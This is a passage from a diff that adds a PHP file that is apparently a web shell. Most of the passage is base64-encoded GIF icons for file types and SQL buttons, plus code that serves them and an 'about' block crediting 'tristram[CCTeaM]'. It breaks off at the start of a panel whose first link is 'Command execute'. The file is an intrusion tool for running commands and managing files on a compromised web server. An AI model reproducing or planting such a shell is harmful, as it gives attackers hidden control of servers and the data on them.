+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} + natsort($images); + $k = array_keys($images); + echo "<center>"; + foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} + echo "</center>"; + } + exit; +} +if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";} +?> +</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> 